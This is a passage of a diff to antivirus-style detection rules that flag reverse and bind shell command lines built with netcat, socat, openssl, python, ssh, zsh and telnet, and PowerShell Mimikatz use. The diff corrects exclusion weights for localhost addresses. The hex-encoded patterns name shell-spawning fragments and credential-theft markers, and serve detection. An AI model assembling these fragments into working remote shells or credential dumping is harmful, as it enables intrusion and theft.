$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486) >=7
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50) >=7
}


@ -8,10 +8,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_M{
$a_00_1 = {64 00 6f 00 20 00 73 00 68 00 20 00 26 00 26 00 20 00 62 00 72 00 65 00 61 00 6b 00 3b 00 } //1 do sh && break;
$a_00_2 = {64 00 6f 00 6e 00 65 00 20 00 32 00 3e 00 26 00 31 00 } //1 done 2>&1
$a_00_3 = {73 00 68 00 20 00 2d 00 63 00 } //1 sh -c
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486) >=4
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50) >=4
}


@ -14,10 +14,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_N{
$a_00_7 = {74 00 63 00 70 00 34 00 3a 00 } //1 tcp4:
$a_00_8 = {75 00 64 00 70 00 2d 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 3a 00 } //1 udp-connect:
$a_00_9 = {75 00 64 00 70 00 34 00 3a 00 } //1 udp4:
$a_00_10 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
$a_00_11 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65456 localhost
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
$a_00_10 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
$a_00_11 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-80 localhost
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
condition:
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*65456+(#a_00_11 & 1)*65456+(#a_00_12 & 1)*65456) >=31
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*-80+(#a_00_11 & 1)*-80+(#a_00_12 & 1)*-80) >=31
}


@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_O{
$a_01_5 = {74 00 65 00 6c 00 6e 00 65 00 74 00 } //1 telnet
$a_00_6 = {32 00 3e 00 26 00 31 00 } //1 2>&1
$a_00_7 = {30 00 3c 00 } //1 0<
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_02_0 & 1)*10+(#a_00_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486) >=15
((#a_02_0 & 1)*10+(#a_00_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50) >=15
}


@ -7,10 +7,10 @@ rule HackTool_MacOS_SuspNetcatCmd_A_BindShell{
$a_00_0 = {6d 00 6b 00 66 00 69 00 66 00 6f 00 } //10 mkfifo
$a_02_1 = {6e 00 63 00 20 00 90 02 20 2d 00 6c 00 90 00 } //30
$a_00_2 = {73 00 68 00 20 00 } //10 sh
$a_00_3 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_3 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_02_1 & 1)*30+(#a_00_2 & 1)*10+(#a_00_3 & 1)*65486+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486) >=50
((#a_00_0 & 1)*10+(#a_02_1 & 1)*30+(#a_00_2 & 1)*10+(#a_00_3 & 1)*-50+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50) >=50
}


@ -9,10 +9,10 @@ rule HackTool_MacOS_SuspNetcatCmd_A_ReverseShell{
$a_02_2 = {2f 00 62 00 69 00 6e 00 2f 00 90 02 04 73 00 68 00 90 00 } //10
$a_00_3 = {30 00 3c 00 } //5 0<
$a_00_4 = {32 00 3e 00 26 00 31 00 } //10 2>&1
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_7 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_7 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_02_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*10+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486) >=50
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_02_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*10+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50) >=50
}


@ -10,14 +10,14 @@ rule HackTool_MacOS_SuspOpensslCmd_A_ReverseShell{
$a_00_3 = {2d 00 71 00 75 00 69 00 65 00 74 00 } //5 -quiet
$a_00_4 = {73 00 68 00 20 00 } //15 sh
$a_00_5 = {32 00 3e 00 26 00 31 00 } //5 2>&1
$a_00_6 = {73 00 73 00 68 00 } //65486 ssh
$a_00_7 = {2d 00 73 00 74 00 61 00 74 00 75 00 73 00 } //65486 -status
$a_00_8 = {2d 00 73 00 68 00 6f 00 77 00 63 00 65 00 72 00 74 00 73 00 } //65486 -showcerts
$a_00_9 = {6f 00 73 00 73 00 6c 00 74 00 65 00 73 00 74 00 } //65486 ossltest
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_6 = {73 00 73 00 68 00 } //-50 ssh
$a_00_7 = {2d 00 73 00 74 00 61 00 74 00 75 00 73 00 } //-50 -status
$a_00_8 = {2d 00 73 00 68 00 6f 00 77 00 63 00 65 00 72 00 74 00 73 00 } //-50 -showcerts
$a_00_9 = {6f 00 73 00 73 00 6c 00 74 00 65 00 73 00 74 00 } //-50 ossltest
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_00_2 & 1)*20+(#a_00_3 & 1)*5+(#a_00_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486+(#a_00_11 & 1)*65486+(#a_00_12 & 1)*65486) >=80
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_00_2 & 1)*20+(#a_00_3 & 1)*5+(#a_00_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50+(#a_00_11 & 1)*-50+(#a_00_12 & 1)*-50) >=80
}


@ -14,10 +14,10 @@ rule HackTool_MacOS_SuspPythonCmd_A_ReverseShell{
$a_02_7 = {63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 90 02 02 28 00 90 00 } //5
$a_00_8 = {64 00 75 00 70 00 32 00 } //1 dup2
$a_00_9 = {73 00 75 00 62 00 70 00 72 00 6f 00 63 00 65 00 73 00 73 00 2e 00 70 00 69 00 70 00 65 00 } //1 subprocess.pipe
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_02_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_02_7 & 1)*5+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*65486+(#a_00_11 & 1)*65486+(#a_00_12 & 1)*65486) >=46
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_02_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_02_7 & 1)*5+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*-50+(#a_00_11 & 1)*-50+(#a_00_12 & 1)*-50) >=46
}


@ -16,10 +16,10 @@ rule HackTool_MacOS_SuspPythonCmd_A_ReverseShellSsl{
$a_00_9 = {77 00 72 00 61 00 70 00 5f 00 73 00 6f 00 63 00 6b 00 65 00 74 00 } //20 wrap_socket
$a_00_10 = {64 00 75 00 70 00 32 00 } //1 dup2
$a_00_11 = {73 00 75 00 62 00 70 00 72 00 6f 00 63 00 65 00 73 00 73 00 2e 00 70 00 69 00 70 00 65 00 } //1 subprocess.pipe
$a_00_12 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_13 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_14 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_12 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_13 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_14 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*10+(#a_02_5 & 1)*15+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_02_8 & 1)*5+(#a_00_9 & 1)*20+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*65486+(#a_00_13 & 1)*65486+(#a_00_14 & 1)*65486) >=66
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*10+(#a_02_5 & 1)*15+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_02_8 & 1)*5+(#a_00_9 & 1)*20+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*-50+(#a_00_13 & 1)*-50+(#a_00_14 & 1)*-50) >=66
}


@ -10,10 +10,10 @@ rule HackTool_MacOS_SuspSocatCmd_A_BindShell{
$a_00_3 = {70 00 74 00 79 00 } //5 pty
$a_00_4 = {74 00 63 00 70 00 2d 00 6c 00 69 00 73 00 74 00 65 00 6e 00 3a 00 } //1 tcp-listen:
$a_00_5 = {75 00 64 00 70 00 2d 00 6c 00 69 00 73 00 74 00 65 00 6e 00 3a 00 } //1 udp-listen:
$a_00_6 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_6 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486) >=41
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50) >=41
}


@ -12,10 +12,10 @@ rule HackTool_MacOS_SuspSocatCmd_A_ReverseShell{
$a_00_5 = {74 00 63 00 70 00 34 00 3a 00 } //1 tcp4:
$a_00_6 = {75 00 64 00 70 00 2d 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 3a 00 } //1 udp-connect:
$a_00_7 = {75 00 64 00 70 00 34 00 3a 00 } //1 udp4:
$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_9 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_9 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486) >=41
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50) >=41
}


@ -10,11 +10,11 @@ rule HackTool_MacOS_SuspSshCmd_A_ReverseShell{
$a_00_3 = {75 00 73 00 65 00 72 00 6b 00 6e 00 6f 00 77 00 6e 00 68 00 6f 00 73 00 74 00 73 00 66 00 69 00 6c 00 65 00 3d 00 2f 00 64 00 65 00 76 00 2f 00 6e 00 75 00 6c 00 6c 00 } //10 userknownhostsfile=/dev/null
$a_00_4 = {3c 00 30 00 } //5 <0
$a_00_5 = {32 00 3e 00 26 00 31 00 } //5 2>&1
$a_00_6 = {6d 00 6b 00 6c 00 6f 00 63 00 61 00 6c 00 65 00 } //65486 mklocale
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_6 = {6d 00 6b 00 6c 00 6f 00 63 00 61 00 6c 00 65 00 } //-50 mklocale
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_02_2 & 1)*20+(#a_00_3 & 1)*10+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486) >=65
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_02_2 & 1)*20+(#a_00_3 & 1)*10+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50) >=65
}


@ -8,10 +8,10 @@ rule HackTool_MacOS_SuspZshCmd_A_BindShell{
$a_00_1 = {7a 00 6d 00 6f 00 64 00 6c 00 6f 00 61 00 64 00 } //20 zmodload
$a_00_2 = {7a 00 73 00 68 00 2f 00 6e 00 65 00 74 00 2f 00 74 00 63 00 70 00 } //20 zsh/net/tcp
$a_02_3 = {7a 00 74 00 63 00 70 00 20 00 90 02 20 2d 00 6c 00 90 00 } //20
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_5 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_5 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_02_3 & 1)*20+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486) >=70
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_02_3 & 1)*20+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50) >=70
}


@ -11,10 +11,10 @@ rule HackTool_MacOS_SuspZshCmd_A_ReverseShell{
$a_00_4 = {7a 00 73 00 68 00 20 00 3e 00 26 00 } //10 zsh >&
$a_00_5 = {32 00 3e 00 26 00 } //5 2>&
$a_00_6 = {30 00 3e 00 26 00 } //5 0>&
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*10+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486) >=90
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*10+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50) >=90
}


@ -12,17 +12,17 @@ rule HackTool_PowerShell_Mikatz_dha_{
$a_00_5 = {4d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a 00 } //1 Mimikatz
$a_00_6 = {70 00 72 00 69 00 76 00 69 00 6c 00 65 00 67 00 65 00 3a 00 3a 00 64 00 65 00 62 00 75 00 67 00 } //1 privilege::debug
$a_00_7 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 5f 00 72 00 65 00 66 00 6c 00 65 00 63 00 74 00 69 00 76 00 65 00 5f 00 6d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a 00 } //2 powershell_reflective_mimikatz
$a_80_8 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
$a_80_9 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
$a_80_10 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
$a_80_11 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ 65516
$a_80_12 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers 65516
$a_80_13 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
$a_80_15 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
$a_80_16 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
$a_80_8 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
$a_80_9 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
$a_80_10 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
$a_80_11 = {5c 6d 63 61 66 65 65 5c 65 6e 64 70 6f 69 6e 74 20 73 65 63 75 72 69 74 79 5c } //\mcafee\endpoint security\ -20
$a_80_12 = {5c 74 68 72 65 61 74 20 70 72 65 76 65 6e 74 69 6f 6e 5c 69 70 73 5c 68 69 70 68 61 6e 64 6c 65 72 73 } //\threat prevention\ips\hiphandlers -20
$a_80_13 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
$a_80_15 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
$a_80_16 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*2+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516+(#a_80_14 & 1)*65516+(#a_80_15 & 1)*65516+(#a_80_16 & 1)*65516) >=7
